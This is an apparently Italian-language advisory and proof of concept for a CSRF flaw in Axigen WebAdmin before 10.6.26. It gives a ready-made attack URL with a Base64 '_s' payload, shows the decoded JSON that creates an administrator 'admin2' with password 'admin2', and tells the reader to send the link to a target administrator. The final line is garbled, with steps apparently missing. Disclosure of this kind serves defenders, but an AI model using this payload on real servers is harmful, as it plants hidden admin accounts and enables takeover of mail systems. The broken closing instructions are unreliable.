
Axigen WebAdmin CSRF Vulnerability
Le azioni critiche di modifica dello stato nell'interfaccia Axigen WebAdmin sono accessibili tramite richieste GET. Mentre il token _h protegge dal CSRF diretto, l'applicazione elabora le richieste in coda tramite il parametro _s (breadcrumb) immediatamente dopo l'autenticazione dell'utente.
Un attaccante può creare un URL contenente un payload codificato in Base64 nel parametro _s. Se un amministratore fa clic su questo link e completa il processo di login, l'azione in coda viene eseguita automaticamente nel suo contesto.
Versioni affette: < 10.6.26
Per maggiori informazioni, consulta la Knowledge Base di Axigen.
URL di destinazione:
https://{axigen-domain}:9443/?_h=invalid&_s=eyJwYWdlIjoiYXVzciIsInBhcmFtcyI6eyJhY3Rpb24iOiJhZGQiLCAidXNlcm5hbWVfaW5wdXQiOiJhZG1pbjIiLCAicGFzc3dvcmRfaW5wdXQiOiJhZG1pbjIiLCAiZGlzcGxheV9uYW1lX2lucHV0IjoiYWRtaW4yIn19
Payload decodificato (parametro _s):
{"page":"ausr","params":{"action":"add", "username_input":"admin2", "password_input":"admin2", "display_name_input":"admin2"}}
_s nell'URL dell'attacco e consegnalo a un amministratore bersaglio.admin2 viene creato (o viene eseguita la tua azione personalizzata).